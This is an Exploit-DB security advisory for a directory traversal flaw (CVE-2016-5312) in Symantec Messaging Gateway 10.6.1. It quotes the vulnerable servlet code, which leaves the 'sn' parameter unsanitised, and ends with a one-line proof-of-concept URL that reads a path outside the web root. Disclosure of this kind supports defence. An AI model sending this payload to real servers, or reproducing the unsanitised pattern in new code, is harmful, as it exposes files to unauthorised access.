Symantec Messaging Gateway 10.6.1 – Directory Traversal

  • 作者: R-73eN
    日期: 2016-09-28
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/40437/
  • # Title : Symantec Messaging Gateway <= 10.6.1 Directory Traversal
# Date : 28/09/2016
# Author : R-73eN
# Tested on : Symantec Messaging Gateway 10.6.1 (Latest)
# Software : https://www.symantec.com/products/threat-protection/messaging-gateway
# Vendor : Symantec
# CVE : CVE-2016-5312
# Vendor Advisory and Fix: https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160927_00
# 
#_________ __
# |_ _|_ __/ _| ___/ ___| ___ _ __/ \| |
#| || '_ \| |_ / _ \| |_ / _ \ '_ \/ _ \ | |
#| || | | |_| (_) | |_| |__/ | | |/ ___ \| |___ 
# |___|_| |_|_|\___/ \____|\___|_| |_| /_/ \_\_____|
#
#
# DESCRIPTION:
#
# A charting component in the Symantec Messaging Gateway control center does not properly sanitize user input submitted for charting requests. 
# This could potentially result in an authorized but less privileged user gaining access to paths outside the authorized directory. 
# This could potentially provide read access to some files/directories on the server for which the user is not authorized.
#
The problem relies in the package kavachart-kcServlet-5.3.2.jar , File : com/ve/kavachart/servlet/ChartStream.java
The vulnerable code is
extends HttpServlet {
public void doGet(HttpServletRequest httpServletRequest, HttpServletResponse httpServletResponse) {
block6 : {
try {
String string = httpServletRequest.getParameter("sn"); 
//**** Taking parameter "sn" and writing it to the "string variable"


if (string == null) break block6;
String string2 = string.substring(string.length() - 3);
 
byte[] arrby = (byte[])this.getServletContext().getAttribute(string); 
 
//**** The string variable is passed here without any sanitanization for directory traversal
//**** and you can successfully use this to do a directory traversal.

if (arrby != null) {
httpServletResponse.setContentType("image/" + string2);
ServletOutputStream servletOutputStream = httpServletResponse.getOutputStream();
httpServletResponse.setContentLength(arrby.length);
servletOutputStream.write(arrby);
this.getServletContext().removeAttribute(string);
break block6;
}


POC: 
https://IP-address:PORT/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/lib
    Java